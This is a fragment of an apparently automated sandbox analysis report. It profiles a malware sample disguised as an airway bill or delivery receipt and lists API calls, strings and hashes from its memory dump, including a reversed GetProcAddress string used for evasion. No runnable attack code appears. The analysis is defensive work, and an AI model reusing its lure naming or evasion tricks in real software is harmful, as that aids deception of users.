                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 08891fea0e65882e64dd3236ca6edf1095d128b8e110253f6cee811b4537ca77
                                                                                                    • Instruction ID: 41ba9a5f7c21212b028a1ca97f7bff3bf93b4bdd294e69b9c9e16ce518888278
                                                                                                    • Opcode Fuzzy Hash: 08891fea0e65882e64dd3236ca6edf1095d128b8e110253f6cee811b4537ca77
                                                                                                    • Instruction Fuzzy Hash: DF517FA64193C24FC7635F3494E62C23FA1ED6352874E11DAC8E08F2B7E619494BDF62
                                                                                                    Function 02B220C4 Relevance: .1, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                    Function 02B2D214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02B2D21D
                                                                                                      • Part of subcall function 02B2D1E8: GetProcAddress.KERNEL32(00000000), ref: 02B2D201
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                    • API String ID: 1646373207-1918263038
                                                                                                    • Opcode ID: e1081c6884ab5b775a44db948e857c2ec21c8e78325d63cc3f794430c1ba0e3b
                                                                                                    • Instruction ID: bde7d9d7a449cb8dee3ee202645d36836a840eebd6ee8025c2ac599a92860fb8
                                                                                                    • Opcode Fuzzy Hash: e1081c6884ab5b775a44db948e857c2ec21c8e78325d63cc3f794430c1ba0e3b
                                                                                                    • Instruction Fuzzy Hash: B7416D62A9533A4B12086F6D780042B7F9ED7883913A144DFF05CCBB44DD20B99F8E6A
                                                                                                    Function 02B36E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02B36E5E
                                                                                                    • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02B36E6F
                                                                                                    • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02B36E7F
                                                                                                    • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02B36E8F
                                                                                                    • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02B36E9F
                                                                                                    • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02B36EAF
                                                                                                    • GetProcAddress.KERNEL32(00000002), ref: 02B36EBF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                    • API String ID: 667068680-2233174745
                                                                                                    • Opcode ID: 7c1ac579edc1bab7adcac2cf1e6fcf44590bbdadbe6e82608f0c32e2d7631765
                                                                                                    • Instruction ID: 5bc7630051104b472d665a981389d4396ac15851a889144abf612cbc984658ac
                                                                                                    • Opcode Fuzzy Hash: 7c1ac579edc1bab7adcac2cf1e6fcf44590bbdadbe6e82608f0c32e2d7631765
                                                                                                    • Instruction Fuzzy Hash: ADF0ACB8A883727EB3137F709CC18673BDDE701A4470019E6B61696A12DAB5841C4F64
                                                                                                    Function 02B22530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02B228CE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                    • API String ID: 2030045667-32948583
                                                                                                    • Opcode ID: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
                                                                                                    • Instruction ID: ef074bb8b2e0ef6134537f12044adc3609150cac9be9238bd9d79d37fc45beac
                                                                                                    • Opcode Fuzzy Hash: 30f2382ea7ac69a246c6190321eefd1c97b25157a34f9ba4d3c5bfee8643d1eb
                                                                                                    • Instruction Fuzzy Hash: 6AA1B131A043788BDB21AA2CCC84B99B6E5EB09350F1441E5ED4DEB386CB7599CECF51
                                                                                                    Function 02B2252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    • bytes: , xrefs: 02B2275D
                                                                                                    • , xrefs: 02B22814
                                                                                                    • The unexpected small block leaks are:, xrefs: 02B22707
                                                                                                    • Unexpected Memory Leak, xrefs: 02B228C0
                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02B22849
                                                                                                    • An unexpected memory leak has occurred. , xrefs: 02B22690
                                                                                                    • 7, xrefs: 02B226A1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                    • API String ID: 0-2723507874
                                                                                                    • Opcode ID: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
                                                                                                    • Instruction ID: 52f48dc29ee7f02ac22b639924af9f6a8f66314d1e7bdd7a70e2c2592ca10a98
                                                                                                    • Opcode Fuzzy Hash: f2983cb85add3d6b13230e4230c5e30f00bd3d797609e6ccf031857a607d5b37
                                                                                                    • Instruction Fuzzy Hash: 5D719230A043788FDB21AA2CCC84BD9BAE5EB09754F1041E5D94DEB281DB759AC9CF51
                                                                                                    Function 02B2BD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(00000000,02B2C00B,?,?,00000000,00000000), ref: 02B2BD76
                                                                                                      • Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Locale$InfoThread
                                                                                                    • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                    • API String ID: 4232894706-2493093252
                                                                                                    • Opcode ID: 63b6a37788cc9953f5343d8d0add01b9b7d3f43e7c8698fa8b4503afc28eed14
                                                                                                    • Instruction ID: 6ebdd7fb2dacc12e4a4cf657a1ad8978dc86fd9d9784f31c344c3869f2a3611a
                                                                                                    • Opcode Fuzzy Hash: 63b6a37788cc9953f5343d8d0add01b9b7d3f43e7c8698fa8b4503afc28eed14
                                                                                                    • Instruction Fuzzy Hash: CF616E35B003689BDB00FBA4DC90BDF77BBDF48340F1198B5A1099B605CA38D94E9BA5
                                                                                                    Function 02B3AE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AE38
                                                                                                    • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02B3AE4F
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000004), ref: 02B3AEE3
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000002), ref: 02B3AEEF
                                                                                                    • IsBadReadPtr.KERNEL32(?,00000014), ref: 02B3AF03
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Read$HandleModule
                                                                                                    • String ID: KernelBase$LoadLibraryExA
                                                                                                    • API String ID: 2226866862-113032527
                                                                                                    • Opcode ID: 6f5de11134bf9064cb31d8ce290aba7405be1d99a2657e10d1dbf065e73ec4a3
                                                                                                    • Instruction ID: b85f60ed237f951c2e89ea557c60191714f1af377d90485f7c3a2b13f6eb55c9
                                                                                                    • Opcode Fuzzy Hash: 6f5de11134bf9064cb31d8ce290aba7405be1d99a2657e10d1dbf065e73ec4a3
                                                                                                    • Instruction Fuzzy Hash: 563122B1640315BBDB12DF68CC85F9A77A8EF04754F204590FA98DB281D774A950CBA1
                                                                                                    Function 02B2432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B24365
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8,?,?,02B4D7A8,02B2655D,02B4C30D), ref: 02B2436B
                                                                                                    • GetStdHandle.KERNEL32(000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?,02B807C8), ref: 02B24380
                                                                                                    • WriteFile.KERNEL32(00000000,000000F5,02B243B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02B243F3,?,?), ref: 02B24386
                                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02B243A4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileHandleWrite$Message
                                                                                                    • String ID: Error$Runtime error at 00000000
                                                                                                    • API String ID: 1570097196-2970929446
                                                                                                    • Opcode ID: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
                                                                                                    • Instruction ID: 307a2fde8b0f9d07f7b8676dad534f2884633019e781f05f1b82ac8d85953777
                                                                                                    • Opcode Fuzzy Hash: 0deee3a5155c4083fa1bbfa134a053316d06f40084b134b2908d8d2749303e7e
                                                                                                    • Instruction Fuzzy Hash: 7BF02B71AD033074F710A7646D46F59276C4B05F55F104AD4F23C994D18BB490CCDB26
                                                                                                    Function 02B2AE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 02B2ACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02B2ACD9
                                                                                                      • Part of subcall function 02B2ACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02B2ACFD
                                                                                                      • Part of subcall function 02B2ACBC: GetModuleFileNameA.KERNEL32(02B20000,?,00000105), ref: 02B2AD18
                                                                                                      • Part of subcall function 02B2ACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02B2ADAE
                                                                                                    • CharToOemA.USER32(?,?), ref: 02B2AE7B
                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02B2AE98
                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AE9E
                                                                                                    • GetStdHandle.KERNEL32(000000F4,02B2AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEB3
                                                                                                    • WriteFile.KERNEL32(00000000,000000F4,02B2AF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02B2AEB9
                                                                                                    • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02B2AEDB
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02B2AEF1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                    • String ID:
                                                                                                    • API String ID: 185507032-0
                                                                                                    • Opcode ID: 491f808e2b7a675c36f1f545d5a9c6246c2cbdb305617e945d2fb2f1840e0b96
                                                                                                    • Instruction ID: 11047321ceed2af91b8804a99d83c7b5814b2d479ac08b8385ac415a4eef22a1
                                                                                                    • Opcode Fuzzy Hash: 491f808e2b7a675c36f1f545d5a9c6246c2cbdb305617e945d2fb2f1840e0b96
                                                                                                    • Instruction Fuzzy Hash: 1A1130B25483507ED601FBA4DC81F9B77EDAB44740F40099AB758D71E0DA70E94C8F66
                                                                                                    Function 02B2E50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02B2E5A5
                                                                                                    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02B2E5C1
                                                                                                    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02B2E5FA
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02B2E677
                                                                                                    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02B2E690
                                                                                                    • VariantCopy.OLEAUT32(?,00000000), ref: 02B2E6C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                    • String ID:
                                                                                                    • API String ID: 351091851-0
                                                                                                    • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction ID: aa8a0f72767948a6574ddabd34ab5f3960e8fe41a1014243c0a974b32238fde2
                                                                                                    • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                    • Instruction Fuzzy Hash: 7F51C6759007299BCB22DB59CC80BD9B3BDAF4D304F0442D5E60DA7206DA30EF898F65
                                                                                                    Function 02B23568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B2358A
                                                                                                    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235BD
                                                                                                    • RegCloseKey.ADVAPI32(?,02B235E0,00000000,?,00000004,00000000,02B235D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02B235D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                    • Opcode ID: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
                                                                                                    • Instruction ID: f060609930730e8b638e9741eb05c7260813a215267a686851b9cb279585f51c
                                                                                                    • Opcode Fuzzy Hash: b5e316522baf2860815bfe892ef7778b04a6ec91f882216649677726fa1e674a
                                                                                                    • Instruction Fuzzy Hash: 7201D879954328BAF711DB90CD42BBD77FCEB08710F1005E1BA0CD7680E678AA14DB59
                                                                                                    Function 02B380C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B38148,?,?,00000000,00000000,?,02B38061,00000000,KernelBASE,00000000,00000000,02B38088), ref: 02B3810D
                                                                                                    • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B38113
                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 02B38125
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2197260568.0000000002B21000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B20000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2197240388.0000000002B20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197360130.0000000002B4D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197473346.0000000002B81000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C75000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2197507520.0000000002C78000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_2b20000_Airway bill details - Delivery receipt Contact Form no_45987165927 ,pd.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                    • String ID: Kernel32$sserddAcorPteG
                                                                                                    • API String ID: 667068680-1372893251
                                                                                                    • Opcode ID: 6d1bec3b9f3e7e35ed84b7aa921e8b14818c4212109a58f2ec86b04f4cbf6aec
                                                                                                    • Instruction ID: 8acf2a93a133c37591560a337c867ce83f8fc216adcddbc4a490d41ec46cd9eb
                                                                                                    • Opcode Fuzzy Hash: 6d1bec3b9f3e7e35ed84b7aa921e8b14818c4212109a58f2ec86b04f4cbf6aec
                                                                                                    • Instruction Fuzzy Hash: 5E014F75A50308BFEB02EFA4DC41A9E77BEEB4D710F5184A4F508A7A10DA70A915CA21
                                                                                                    Function 02B2A9D0 Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetThreadLocale.KERNEL32(?,00000000,02B2AA67,?,?,00000000), ref: 02B2A9E8
                                                                                                      • Part of subcall function 02B2A744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02B2A762
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,02B2AA67,?,?,00000000), ref: 02B2AA18
                                                                                                    • EnumCalendarInfoA.KERNEL32(Function_0000A91C,00000000,00000000,00000004), ref: 02B2AA23
                                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,02B2AA67,?,?,00000000), ref: 02B2AA41
